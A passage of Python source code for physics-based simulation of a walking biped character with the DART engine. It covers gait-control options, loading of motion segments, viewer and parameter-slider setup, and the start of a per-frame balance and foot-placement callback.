filename:\n REPEATED = True\n CAMERA_TRACKING = True\n else:\n REPEATED = False\n\n #===============================================================================\n # options\n #===============================================================================\n SEGMENT_EDITING = True\n STANCE_FOOT_STABILIZE = True\n MATCH_STANCE_LEG = True\n SWING_FOOT_PLACEMENT = True\n SWING_FOOT_HEIGHT = True\n\n SWING_FOOT_ORIENTATION = False\n\n STANCE_FOOT_PUSH = True\n STANCE_FOOT_BALANCING = True\n # STANCE_FOOT_BALANCING = False\n\n SWING_FOOT_CLEARANCE = True\n\n SEGMENT_GAIN_ADJUST = True\n\n stitch_func = lambda xx : 1. - yfg.hermite2nd(xx)\n stf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])\n match_stl_func = yfg.hermite2nd\n swf_placement_func = yfg.hermite2nd\n # swf_placement_func = yfg.identity\n swf_height_func = yfg.hermite2nd\n swf_height_sine_func = yfg.sine\n # stf_balancing_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])\n stf_balancing_func = yfg.hermite2nd\n # stf_balancing_func = yfg.hermite5th\n\n # forceInfos = [ForceInfo(70, .4, (100,0,0))]\n forceInfos = []\n\n #===============================================================================\n # initialize character\n #===============================================================================\n # mcfgfile = open(dir + 'mcfg', 'r')\n # mcfg = cPickle.load(mcfgfile)\n # mcfgfile.close()\n\n mcfg = buildMcfg()\n\n wcfg = ypc.WorldConfig()\n wcfg.planeHeight = 0.\n wcfg.useDefaultContactModel = False\n wcfg.lockingVel = c_locking_vel\n stepsPerFrame = 50\n wcfg.timeStep = frameTime/stepsPerFrame\n\n pydart.init()\n dartModel = cpm.DartModel(wcfg, motion_ori[0], mcfg, False)\n dartMotionModel = None # type: cpm.DartModel\n if not isCma:\n dartMotionModel = cpm.DartModel(wcfg, motion_ori[0], mcfg)\n # q = dartModel.skeleton.q\n # q[0:3] = mm.logSO3(motion_ori.getJointOrientationGlobal(0, 0))\n # q[3:6] = motion_ori.getJointPositionGlobal(0, 0)\n # dartModel.skeleton.set_positions(q)\n # q[3:6] = motion_ori.getJointPositionGlobal(0, 0)\n # pdController = PDController(dartModel.skeleton, wcfg.timeStep, Kt=1000., Dt=50.)\n pdController = PDController(dartModel.skeleton, wcfg.timeStep)\n # dartModel.skeleton.set_controller(pdController)\n # dartModel.world.set_gravity(np.array((0., 0., 0.)))\n dartModel.initializeHybridDynamics()\n dartModel.initializeForwardDynamics()\n\n # dartModel.skeleton.inv_mass_matrix()\n\n # print(dartModel.skeleton.coriolis_and_gravity_forces())\n\n # dartModel.getJoint('LeftFoot').set_actuator_type(pydart.Joint.FORCE)\n # dartModel.getJoint('RightFoot').set_actuator_type(pydart.Joint.FORCE)\n\n #===============================================================================\n # load segment info\n #===============================================================================\n skeleton = motion_ori[0].skeleton\n\n segname = os.path.splitext(filename)[0]+'.seg'\n segfile = open(motionDir+segname, 'r')\n seginfo = load(segfile)\n segfile.close()\n\n if not isCma:\n for seg in seginfo:\n print(seg)\n\n intervals = [info['interval'] for info in seginfo]\n states = [info['state'] for info in seginfo]\n temp_motion = copy.deepcopy(motion_ori)\n segments = yma.splitMotionIntoSegments(temp_motion, intervals)\n if not isCma:\n print(len(intervals), 'segments')\n for i in range(len(intervals)):\n print('%dth'%i, yba.GaitState.text[states[i]], intervals[i], ',',)\n print(\"\")\n\n motion_seg_orig = ym.JointMotion()\n motion_seg_orig += segments[0]\n motion_seg = ym.JointMotion()\n motion_seg += segments[0]\n motion_stitch = ym.JointMotion()\n motion_stitch += segments[0]\n\n motion_stf_stabilize = ym.JointMotion()\n motion_match_stl = ym.JointMotion()\n motion_swf_placement = ym.JointMotion()\n motion_swf_height = ym.JointMotion()\n motion_swf_orientation = ym.JointMotion()\n motion_stf_balancing = ym.JointMotion()\n motion_stf_push = ym.JointMotion()\n motion_control = ym.JointMotion()\n\n motion_debug1 = ym.JointMotion()\n motion_debug2 = ym.JointMotion()\n motion_debug3 = ym.JointMotion()\n\n P = ym.JointMotion()\n P_hat = ym.JointMotion()\n M_tc = ym.JointMotion()\n M_hat_tc_1 = ym.JointMotion()\n\n #===============================================================================\n # loop variable\n #===============================================================================\n seg_index = [0]\n acc_offset = [0]\n extended = [False]\n prev_R_swp = [None]\n stl_y_limit_num = [0]\n stl_xz_limit_num = [0]\n avg_dCM = [mm.O_Vec3()]\n # avg_stf_v = [mm.O_Vec3()]\n # avg_stf_av = [mm.O_Vec3()]\n\n # stf_push_func = [yfg.zero]\n step_length_cur = [0.]\n\n step_length_tar = [0.]\n step_axis = [mm.O_Vec3()]\n #===============================================================================\n # information\n #===============================================================================\n bodyIDsToCheck = range(dartModel.getBodyNum())\n # bodyIDsToCheck = [dartModel.getBody(\"LeftFoot\").index_in_skeleton(), dartModel.getBody(\"RightFoot\").index_in_skeleton()]\n mus = [mu]*len(bodyIDsToCheck)\n\n totalMass = dartModel.getTotalMass()\n # bodyMasses = controlModel.getBodyMasses()\n # totalMass = controlModel.getTotalMass()\n\n # hwangpil\n # extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_1_0',\n # 'Foot_foot_1_1', 'Foot_foot_2_0', 'Foot_foot_2_1']\n\n extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0',\n 'Foot_foot_1_1', 'Foot_foot_1_2']\n\n # extendedFootName = ['Foot_foot_0_1', 'Foot_foot_1_1', 'Foot_foot_2_1']\n\n\n ToeName = ['Foot_foot_0_0_0', 'Foot_foot_0_1_0']\n HeelName = ['Foot_foot_1_0', 'Foot_foot_1_1', 'Foot_foot_1_2']\n\n lIDs = [skeleton.getJointIndex('Left'+name) for name in extendedFootName]\n rIDs = [skeleton.getJointIndex('Right'+name) for name in extendedFootName]\n\n lIDdic = {'Left'+name:skeleton.getJointIndex('Left'+name) for name in extendedFootName}\n rIDdic = {'Right'+name:skeleton.getJointIndex('Right'+name) for name in extendedFootName}\n footIdDic = lIDdic.copy()\n footIdDic.update(rIDdic)\n\n lToes = [skeleton.getJointIndex('Left'+name) for name in ToeName]\n rToes = [skeleton.getJointIndex('Right'+name) for name in ToeName]\n\n lHeels = [skeleton.getJointIndex('Left'+name) for name in HeelName]\n rHeels = [skeleton.getJointIndex('Right'+name) for name in HeelName]\n\n footDofNames = [] # type: list[str]\n footDofNames += sum(list(['j_Left'+name+'_x', 'j_Left'+name+'_y', 'j_Left'+name+'_z'] for name in extendedFootName), [])\n footDofNames += sum(list(['j_Right'+name+'_x', 'j_Right'+name+'_y', 'j_Right'+name+'_z'] for name in extendedFootName), [])\n\n footDofs = None\n if SEGMENT_FOOT:\n footDofs = dartModel.skeleton.dof_indices(footDofNames)\n LeftFootDofs = dartModel.skeleton.dof_indices(['j_LeftFoot_x','j_LeftFoot_y','j_LeftFoot_z'])\n RightFootDofs = dartModel.skeleton.dof_indices(['j_RightFoot_x','j_RightFoot_y','j_RightFoot_z'])\n\n # controlled foot joint dofs\n if SEGMENT_FOOT:\n variableDofIdx = dartModel.skeleton.dof_indices(footDofNames)\n # joint dofs except foot joint\n specifiedDofIdx = list(range(dartModel.getTotalDOF()))\n for dofidx in variableDofIdx:\n specifiedDofIdx.remove(dofidx)\n\n # for i in lIDs+rIDs:\n # controlModel.setHybridDynamics(i, \"DYNAMIC\")\n\n # each dof is whether KINEMATIC or not\n hdAccMask = [True]*dartModel.getTotalDOF()\n hdAccMask[:6] = [False]*6\n # for i in lIDs+rIDs:\n # hdAccMask[3+3*i : 6+3*i] = [False]*3\n\n # for i in range(1, len(dartModel.skeleton.joints)):\n # dartModel.skeleton.joints[i].set_actuator_type(pydart.Joint.ACCELERATION)\n\n\n lID = dartModel.skeleton.bodynode_index('LeftFoot')\n rID = dartModel.skeleton.bodynode_index('RightFoot')\n\n lUpLeg = skeleton.getJointIndex('LeftUpLeg');rUpLeg = skeleton.getJointIndex('RightUpLeg')\n lKnee = skeleton.getJointIndex('LeftLeg'); rKnee = skeleton.getJointIndex('RightLeg')\n lFoot = skeleton.getJointIndex('LeftFoot'); rFoot = skeleton.getJointIndex('RightFoot')\n spine = skeleton.getJointIndex('Spine')\n\n uppers = [skeleton.getJointIndex(name) for name in ['Hips', 'Spine', 'Spine1', 'LeftArm', 'LeftForeArm', 'RightArm', 'RightForeArm']]\n # upperMass = sum([bodyMasses[i] for i in uppers])\n lLegs = [skeleton.getJointIndex(name) for name in ['LeftUpLeg', 'LeftLeg', 'LeftFoot']]\n rLegs = [skeleton.getJointIndex(name) for name in ['RightUpLeg', 'RightLeg', 'RightFoot']]\n allJoints = set(range(skeleton.getJointNum()))\n\n\n '''\n footMass = sum([bodyMasses[i] for i in lIDs]) + bodyMasses[lID]\n HeelMass = sum([bodyMasses[i] for i in lHeels])\n ToeMass = sum([bodyMasses[i] for i in lToes])\n print('totalMass: ', totalMass)\n print('footMass: ', footMass)\n print('heelmass: ', HeelMass)\n print('ToeMass: ', ToeMass)\n #'''\n\n halfFootHeight = SEGMENT_FOOT_RAD\n if not SEGMENT_FOOT:\n halfFootHeight = dartModel.getBody(lFoot).shapenodes[0].shape.size()[1]/2.\n\n for fi in forceInfos:\n fi.targetBody = spine\n\n #hwangpil\n prev_contact_count = [0]\n\n #===========================================================================\n # data collection\n #===========================================================================\n rhip_torques = []\n rknee_torques = []\n rankle_torques = []\n rankle_torques = []\n\n #===============================================================================\n # rendering\n #===============================================================================\n rd_CM = [None]; rd_CP = [None]; rd_CMP = [None]\n rd_forces = [None]; rd_force_points = [None]\n rd_torques = []; rd_joint_positions = []\n\n rd_point1 = [None]\n rd_point2 = [None]\n rd_vec1 = [None]; rd_vecori1 = [None]\n rd_vec2 = [None]; rd_vecori2 = [None]\n rd_frame1 = [None]\n rd_frame2 = [None]\n\n rd_cForces = [None]\n rd_cPositions = [None]\n rd_cForcesControl = [None]\n rd_cPositionsControl = [None]\n\n viewer = None\n plot = None\n # plot = ymp.InteractivePlot()\n\n def getParamVal(paramname):\n return viewer.objectInfoWnd.getVal(paramname)\n\n # renderer settings\n if not isCma:\n if MULTI_VIEWER:\n viewer = ymv.MultiViewer(800, 655)\n # viewer = ymv.MultiViewer(800, 655, True)\n viewer.setRenderers1([yr.DartModelRenderer(dartMotionModel, MOTION_COLOR)])\n viewer.setRenderers2([yr.DartModelRenderer(dartModel, (200, 200, 0))])\n else:\n # viewer = ysv.SimpleViewer()\n # viewer = hsv.hpSimpleViewer(viewForceWnd=True)\n viewer = hsv.hpSimpleViewer(viewForceWnd=False)\n # viewer.record(False)\n if not isCma:\n viewer.doc.addRenderer('motionModel', yr.DartModelRenderer(dartMotionModel, (0,150,255), yr.POLYGON_LINE))\n viewer.doc.addRenderer('controlModel', yr.DartModelRenderer(dartModel, (50, 200, 200)))\n\n viewer.doc.addObject('motion_ori', motion_ori)\n viewer.doc.addObject('motion_stf_stabilize', motion_stf_stabilize)\n viewer.doc.addObject('motion_match_stl', motion_match_stl)\n viewer.doc.addObject('motion_swf_placement', motion_swf_placement)\n viewer.doc.addObject('motion_swf_height', motion_swf_height)\n viewer.doc.addObject('motion_swf_orientation', motion_swf_orientation)\n viewer.doc.addObject('motion_stf_push', motion_stf_push)\n viewer.doc.addObject('motion_stf_balancing', motion_stf_balancing)\n viewer.doc.addObject('motion_control', motion_control)\n\n viewer.doc.addRenderer('motion_ori', yr.JointMotionRenderer(motion_ori, (0,100,255), yr.LINK_BONE))\n motion_ori.resourceName = 'motion_ori'\n # viewer.doc.addRenderer('motion_seg_orig', yr.JointMotionRenderer(motion_seg_orig, (0,100,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_seg', yr.JointMotionRenderer(motion_seg, (0,150,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_stitch', yr.JointMotionRenderer(motion_stitch, (0,255,200), yr.LINK_BONE))\n\n viewer.doc.addRenderer('motion_match_stl', yr.JointMotionRenderer(motion_match_stl, (255,200,0), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_swf_placement', yr.JointMotionRenderer(motion_swf_placement, (255,100,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_swf_height', yr.JointMotionRenderer(motion_swf_height, (50,255,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_push', yr.JointMotionRenderer(motion_stf_push, (50,255,200), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_stabilize', yr.JointMotionRenderer(motion_stf_stabilize, (255,0,0), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_stf_balancing', yr.JointMotionRenderer(motion_stf_balancing, (255,100,255), yr.LINK_BONE))\n viewer.doc.addRenderer('motion_control', yr.JointMotionRenderer(motion_control, (255,0,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_swf_orientation', yr.JointMotionRenderer(motion_swf_orientation, (255,100,0), yr.LINK_BONE))\n motion_stf_stabilize.resourceName = 'motion_stf_stabilize'\n motion_match_stl.resourceName = 'motion_match_stl'\n motion_swf_placement.resourceName = 'motion_swf_placement'\n motion_swf_height.resourceName = 'motion_swf_height'\n motion_swf_orientation.resourceName = 'motion_swf_orientation'\n motion_stf_push.resourceName = 'motion_stf_push'\n motion_stf_balancing.resourceName = 'motion_stf_balancing'\n motion_control.resourceName = 'motion_control'\n\n # viewer.doc.addRenderer('motion_debug1', yr.JointMotionRenderer(motion_debug1, (0,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_debug2', yr.JointMotionRenderer(motion_debug2, (255,0,255), yr.LINK_BONE))\n # viewer.doc.addRenderer('motion_debug3', yr.JointMotionRenderer(motion_debug3, (255,255,0), yr.LINK_BONE))\n\n # viewer.doc.addRenderer('M_tc', yr.JointMotionRenderer(M_tc, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('P_hat', yr.JointMotionRenderer(P_hat, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('P', yr.JointMotionRenderer(P, (255,255,0), yr.LINK_BONE))\n # viewer.doc.addRenderer('M_hat_tc_1', yr.JointMotionRenderer(M_hat_tc_1, (255,255,0), yr.LINK_BONE))\n\n # viewer.doc.addRenderer('rd_CM', yr.PointsRenderer(rd_CM, (255,255,0)))\n # viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (255,0,0)))\n # viewer.doc.addRenderer('rd_CMP', yr.PointsRenderer(rd_CMP, (0,255,0)))\n # viewer.doc.addRenderer('forces', yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, fromPoint=False))\n # viewer.doc.addRenderer('torques', yr.VectorsRenderer(rd_torques, rd_joint_positions, (255,0,0)))\n\n viewer.doc.addRenderer('rd_contactForcesControl', yr.VectorsRenderer(rd_cForcesControl, rd_cPositionsControl, (255, 0, 0), .1, 'rd_c1'))\n viewer.doc.addRenderer('rd_contactForces', yr.VectorsRenderer(rd_cForces, rd_cPositions, (0, 255, 0), .1, 'rd_c2'))\n\n viewer.doc.addRenderer('rd_point1', yr.PointsRenderer(rd_point1, (0,255,0)))\n viewer.doc.addRenderer('rd_point2', yr.PointsRenderer(rd_point2, (255,0,0)))\n # viewer.doc.addRenderer('rd_vec1', yr.VectorsRenderer(rd_vec1, rd_vecori1, (255,0,0)))\n viewer.doc.addRenderer('rd_vec2', yr.VectorsRenderer(rd_vec2, rd_vecori2, (0,255,0)))\n # viewer.doc.addRenderer('rd_frame1', yr.FramesRenderer(rd_frame1, (0,200,200)))\n viewer.doc.addRenderer('rd_frame2', yr.FramesRenderer(rd_frame2, (200,200,0)))\n # viewer.setMaxFrame(len(motion_ori)-1)\n\n viewer.objectInfoWnd.add1DSlider(\"penalty_grf_gain\", 0., 5000., 10., Ks)\n viewer.objectInfoWnd.add1DSlider(\"c_min_contact_vel\", 0., 200., .2, 100.)\n viewer.objectInfoWnd.add1DSlider(\"c_min_contact_time\", 0., 5., .01, .7)\n viewer.objectInfoWnd.add1DSlider(\"c_landing_duration\", 0., 5., .01, .2)\n viewer.objectInfoWnd.add1DSlider(\"c_taking_duration\", 0., 5., .01, .3)\n viewer.objectInfoWnd.add1DSlider(\"c_swf_mid_offset\", -1., 1., .001, c_swf_mid_offset)\n viewer.objectInfoWnd.add1DSlider(\"c_locking_vel\", 0., 1., .001, .05)\n\n viewer.objectInfoWnd.add1DSlider(\"c_swf_offset\", -1., 1., .001, .01)\n viewer.objectInfoWnd.add1DSlider(\"K_stp_pos\", 0., 1., .01, 0.)\n\n viewer.objectInfoWnd.add1DSlider(\"c5\", 0., 5., .01, c5)\n viewer.objectInfoWnd.add1DSlider(\"c6\", 0., 1., .01, c6)\n viewer.objectInfoWnd.add1DSlider(\"K_stb_vel\", 0., 1., .01, K_stb_vel)\n viewer.objectInfoWnd.add1DSlider(\"K_stb_pos\", 0., 1., .01, K_stb_pos)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_sag\", 0., 5., .01, K_swp_vel_sag)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_cor\", 0., 5., .01, K_swp_vel_cor)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag\", 0., 5., .01, K_swp_pos_sag)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_cor\", 0., 5., .01, K_swp_pos_cor)\n viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag_faster\",0., 1., .01, K_swp_pos_sag_faster)\n\n viewer.objectInfoWnd.add1DSlider(\"LeftFootKp\", 0., 500., 10., 300.)\n viewer.objectInfoWnd.add1DSlider(\"LeftFootKd\", 0., 100., 1., 30.)\n viewer.objectInfoWnd.add1DSlider(\"RightFootKp\", 0., 500., 10., 300.)\n viewer.objectInfoWnd.add1DSlider(\"RightFootKd\", 0., 100., 1., 30.)\n\n if viewer.cForceWnd is not None:\n viewer.cForceWnd.addDataSet('expForce', FL_BLACK)\n viewer.cForceWnd.addDataSet('desForceMin', FL_RED)\n viewer.cForceWnd.addDataSet('desForceMax', FL_RED)\n viewer.cForceWnd.addDataSet('realForce', FL_GREEN)\n\n if not REPEATED:\n viewer.setMaxFrame(len(motion_ori)-1)\n else:\n viewer.setMaxFrame(MAX_FRAME)\n\n if CAMERA_TRACKING:\n if MULTI_VIEWER:\n cameraTargets1 = [None] * (viewer.getMaxFrame()+1)\n cameraTargets2 = [None] * (viewer.getMaxFrame()+1)\n else:\n cameraTargets = [None] * (viewer.getMaxFrame()+1)\n\n if TORQUE_PLOT:\n rhip_torques = [0.]*viewer.getMaxFrame()\n rknee_torques = [0.]*viewer.getMaxFrame()\n rankle_torques = [0.]*viewer.getMaxFrame()\n\n\n # ===============================================================================\n # viewer setting for parameter setting\n # ===============================================================================\n\n # pt = [0.]\n def postFrameCallback_Always(frame):\n # if frame==1: pt[0] = time.time()\n # if frame==31: print 'elapsed time for 30 frames:', time.time()-pt[0]\n if CAMERA_TRACKING:\n if MULTI_VIEWER:\n if cameraTargets1[frame] is None:\n # cameraTargets1[frame] = motionModel.getBodyPositionGlobal(0)\n cameraTargets1[frame] = dartMotionModel.getBodyPositionGlobal(0)\n # cameraTargets1[frame] = motion_ori[frame].getJointPositionGlobal(0)\n viewer.setCameraTarget1(cameraTargets1[frame])\n\n if cameraTargets2[frame] is None:\n # cameraTargets2[frame] = controlModel.getJointPositionGlobal(0)\n cameraTargets2[frame] = dartModel.getJointPositionGlobal(0)\n viewer.setCameraTarget2(cameraTargets2[frame])\n\n else:\n if cameraTargets[frame] is None:\n cameraTargets[frame] = dartModel.getJointPositionGlobal(0)\n # cameraTargets[frame] = controlModel.getJointPositionGlobal(0)\n viewer.setCameraTarget(cameraTargets[frame])\n if plot is not None:\n plot.updateVline(frame)\n\n\n if not isCma:\n viewer.setPostFrameCallback_Always(postFrameCallback_Always)\n\n if plot is not None:\n plot.setXlimit(0, len(motion_ori))\n plot.setYlimit(-0.05, .05)\n plot.addDataSet('zero')\n plot.addDataSet('diff')\n plot.addDataSet('debug1')\n plot.addDataSet('debug2')\n\n\n def viewer_onClose(data):\n if plot is not None:\n plot.close()\n viewer.onClose(data)\n viewer.callback(viewer_onClose)\n\n if not isCma:\n for bodynode in dartModel.skeleton.bodynodes:\n print(bodynode.name, bodynode.mass())\n\n feedback = hbf.HpBipedFeedback(dartModel, motion_ori, seginfo)\n\n def simulateCallback(frame):\n if not isCma:\n print('frame: ', frame)\n # c_min_contact_vel, c_min_contact_time, c_landing_duration, \\\n # c_taking_duration, c_swf_mid_offset, c_locking_vel, c_swf_offset, \\\n # K_stp_pos, c5, c6, K_stb_vel, K_stb_pos, K_swp_vel_sag, K_swp_vel_cor, \\\n # K_swp_pos_sag, K_swp_pos_cor, K_swp_pos_sag_faster = viewer.objectInfoWnd.getVals()\n if not isCma:\n # if not isCma and params is None:\n Ks = getParamVal(\"penalty_grf_gain\")\n Ds = 2.*(Ks**.5)\n c_min_contact_vel = getParamVal(\"c_min_contact_vel\")\n c_min_contact_time = getParamVal(\"c_min_contact_time\")\n c_landing_duration = getParamVal(\"c_landing_duration\")\n c_taking_duration = getParamVal(\"c_taking_duration\")\n c_swf_mid_offset = getParamVal(\"c_swf_mid_offset\")\n c_locking_vel = getParamVal(\"c_locking_vel\")\n c_swf_offset = getParamVal(\"c_swf_offset\")\n K_stp_pos = getParamVal(\"K_stp_pos\")\n c5 = getParamVal(\"c5\")\n c6 = getParamVal(\"c6\")\n K_stb_vel = getParamVal(\"K_stb_vel\")\n K_stb_pos = getParamVal(\"K_stb_pos\")\n K_swp_vel_sag = getParamVal(\"K_swp_vel_sag\")\n K_swp_vel_cor = getParamVal(\"K_swp_vel_cor\")\n K_swp_pos_sag = getParamVal(\"K_swp_pos_sag\")\n K_swp_pos_cor = getParamVal(\"K_swp_pos_cor\")\n K_swp_pos_sag_faster = getParamVal(\"K_swp_pos_sag_faster\")\n elif params is not None:\n _params = np.around(params, decimals=3)\n Ks = 1000.\n Ds = 2. * (Ks ** .5)\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n c_swf_mid_offset = .02\n c_locking_vel = .05\n\n # c_swf_offset = .0\n c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = _params[0] * _params[0]\n c5 = _params[1] * _params[1]\n c6 = _params[2] * _params[2]\n K_stb_vel = _params[3] * _params[3]\n K_stb_pos = _params[4] * _params[4]\n K_swp_vel_sag = _params[5] * _params[5]\n K_swp_vel_cor = _params[6] * _params[6]\n K_swp_pos_sag = _params[7] * _params[7]\n K_swp_pos_cor = _params[8] * _params[8]\n K_swp_pos_sag_faster = _params[9] * _params[9]\n\n # feedback.refresh_frame_dyn_information(motion_seg, frame, avg_dCM)\n\n # seginfo\n segIndex = seg_index[0]\n curState = seginfo[segIndex]['state']\n cur_interval = yma.offsetInterval(acc_offset[0], seginfo[segIndex]['interval'])\n stanceLegs = seginfo[segIndex]['stanceHips']\n swingLegs = seginfo[segIndex]['swingHips']\n stanceFoots = seginfo[segIndex]['stanceFoots']\n swingFoots = seginfo[segIndex]['swingFoots']\n swingKnees = seginfo[segIndex]['swingKnees']\n groundHeight = seginfo[segIndex]['ground_height']\n maxStfPushFrame = seginfo[segIndex]['max_stf_push_frame']\n\n # hwangpil\n # temporary change\n for legList in (stanceLegs, swingLegs):\n for legIdx in range(len(legList)):\n if legList[legIdx] == 10:\n legList[legIdx] = skeleton.getJointIndex('RightUpLeg')\n\n for footList in (stanceFoots, swingFoots):\n for footIdx in range(len(footList)):\n if footList[footIdx] == 12:\n footList[footIdx] = skeleton.getJointIndex('RightFoot')\n\n stanceToes = []\n if skeleton.getJointIndex('LeftFoot') in stanceFoots:\n stanceToes.extend(lToes)\n if skeleton.getJointIndex('RightFoot') in stanceFoots:\n stanceToes.extend(rToes)\n\n stanceHeels = []\n if skeleton.getJointIndex('LeftFoot') in stanceFoots:\n stanceHeels.extend(lHeels)\n if skeleton.getJointIndex('RightFoot') in stanceFoots:\n stanceHeels.extend(rHeels)\n\n swingToes = []\n if skeleton.getJointIndex('LeftFoot') in swingFoots:\n swingToes.extend(lToes)\n if skeleton.getJointIndex('RightFoot') in swingFoots:\n swingToes.extend(rToes)\n\n swingHeels = []\n if skeleton.getJointIndex('LeftFoot') in swingFoots:\n swingHeels.extend(lHeels)\n if skeleton.getJointIndex('RightFoot') in swingFoots:\n swingHeels.extend(rHeels)\n\n prev_frame = frame-1 if frame>0 else 0\n\n # information\n dCM_tar = motion_seg.getJointVelocityGlobal(0, prev_frame)\n CM_tar = motion_seg.getJointPositionGlobal(0, prev_frame)\n stf_tar = motion_seg.getJointPositionGlobal(stanceFoots[0], prev_frame)\n CMr_tar = CM_tar - stf_tar\n\n # dCM : average velocity of root of controlModel over 1 frame\n dCM = avg_dCM[0]\n CM = dartModel.getBody(\"Hips\").com()\n CMreal = dartModel.getCOM()\n stf = dartModel.getJointPositionGlobal(stanceFoots[0])\n CMr = CM - stf\n\n # diff_dCM : diff of velocity of COM between current and desired\n diff_dCM = mm.projectionOnPlane(dCM-dCM_tar, (1,0,0), (0,0,1))\n # diff_dCM_axis : perpendicular of diff_dCM\n diff_dCM_axis = np.cross((0,1,0), diff_dCM)\n rd_vec1[0] = diff_dCM\n rd_vecori1[0] = CM_tar\n\n diff_CMr = mm.projectionOnPlane(CMr-CMr_tar, (1,0,0), (0,0,1))\n diff_CMr_axis = np.cross((0,1,0), diff_CMr)\n\n direction = mm.normalize2(mm.projectionOnPlane(dCM_tar, (1,0,0), (0,0,1)))\n directionAxis = np.cross((0,1,0), direction)\n\n diff_dCM_sag, diff_dCM_cor = mm.projectionOnVector2(diff_dCM, direction)\n diff_dCM_sag_axis = np.cross((0,1,0), diff_dCM_sag)\n diff_dCM_cor_axis = np.cross((0,1,0), diff_dCM_cor)\n\n diff_CMr_sag, diff_CMr_cor = mm.projectionOnVector2(diff_CMr, direction)\n diff_CMr_sag_axis = np.cross((0,1,0), diff_CMr_sag)\n diff_CMr_cor_axis = np.cross((0,1,0), diff_CMr_cor)\n\n t = (frame-cur_interval[0])/float(cur_interval[1]-cur_interval[0])\n t_raw = t\n if t>1.: t=1.\n\n\n p_root = motion_stitch[frame].getJointPositionGlobal(0)\n R_root = motion_stitch[frame].getJointOrientationGlobal(0)\n\n motion_seg_orig.goToFrame(frame)\n motion_seg.goToFrame(frame)\n motion_stitch.goToFrame(frame)\n\n motion_debug1.append(motion_stitch[frame].copy())\n motion_debug1.goToFrame(frame)\n motion_debug2.append(motion_stitch[frame].copy())\n motion_debug2.goToFrame(frame)\n motion_debug3.append(motion_stitch[frame].copy())\n motion_debug3.goToFrame(frame)\n\n # paper implementation\n M_tc.append(motion_stitch[prev_frame])\n M_tc.goToFrame(frame)\n P_hat.append(M_tc[frame].copy())\n P_hat.goToFrame(frame)\n\n # p_temp = ym.JointPosture(skeleton)\n # p_temp.rootPos = controlModel.getJointPositionGlobal(0)\n # p_temp.setJointOrientationsLocal(controlModel.getJointOrientationsLocal())\n # P.append(p_temp)\n # P.goToFrame(frame)\n\n '''\n # Jacobian Transpose Balance Control\n balanceKp = 100.\n balanceKd = 100.\n balanceDiff = dartMotionModel.getCOM() - dartModel.getCOM()\n balanceDiff[1] = 0.\n balanceVelDiff = -dartModel.skeleton.com_velocity()\n balanceVelDiff[1] = 0.\n balanceTorque = np.dot(dartModel.getBody('RightFoot').world_jacobian()[3:6].T,\n balanceKp*balanceDiff + balanceKd*balanceVelDiff)\n balanceTorque[:6] = np.array([0.]*6)\n '''\n\n '''\n # stance foot stabilize\n motion_stf_stabilize.append(motion_stitch[frame].copy())\n motion_stf_stabilize.goToFrame(frame)\n if STANCE_FOOT_STABILIZE:\n for stanceFoot in stanceFoots:\n R_target_foot = motion_seg[frame].getJointOrientationGlobal(stanceFoot)\n R_current_foot = motion_stf_stabilize[frame].getJointOrientationGlobal(stanceFoot)\n motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, mm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))\n # motion_stf_stabilize[frame].setJointOrientationGlobal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))\n # R_target_foot = motion_seg[frame].getJointOrientationLocal(stanceFoot)\n # R_current_foot = motion_stf_stabilize[frame].getJointOrientationLocal(stanceFoot)\n # motion_stf_stabilize[frame].setJointOrientationLocal(stanceFoot, cm.slerp(R_current_foot, R_target_foot , stf_stabilize_func(t)))\n #'''\n\n # match stance leg\n # motion_match_stl.append(motion_stf_stabilize[frame].copy())\n motion_match_stl.append(motion_stitch[frame].copy())\n motion_match_stl.goToFrame(frame)\n if MATCH_STANCE_LEG:\n # hbf.match_stance_leg(t, dartModel, motion_match_stl, frame, curState, stanceLegs)\n if curState!=yba.GaitState.STOP:\n for stanceLegIdx in range(len(stanceLegs)):\n stanceLeg = stanceLegs[stanceLegIdx]\n # stanceFoot = stanceFoots[stanceLegIdx]\n\n # motion stance leg -> character stance leg as time goes\n R_motion = motion_match_stl[frame].getJointOrientationGlobal(stanceLeg)\n R_character = dartModel.getJointOrientationGlobal(stanceLeg)\n motion_match_stl[frame].setJointOrientationGlobal(stanceLeg, mm.slerp(R_motion, R_character, match_stl_func(t)))\n\n\n # swing foot placement\n # TODO:\n # in segment foot case, hip has noise slitly\n motion_swf_placement.append(motion_match_stl[frame].copy())\n motion_swf_placement.goToFrame(frame)\n if SWING_FOOT_PLACEMENT:\n t_swing_foot_placement = swf_placement_func(t)\n\n if extended[0]:\n R_swp_sag = prev_R_swp[0][0]\n R_swp_cor = prev_R_swp[0][1]\n else:\n clampAngle = math.pi/6.\n R_swp_sag = mm.I_SO3(); R_swp_cor = mm.I_SO3()\n # R_swp_sag = np.dot(R_swp_sag, mm.exp(diff_dCM_sag_axis * 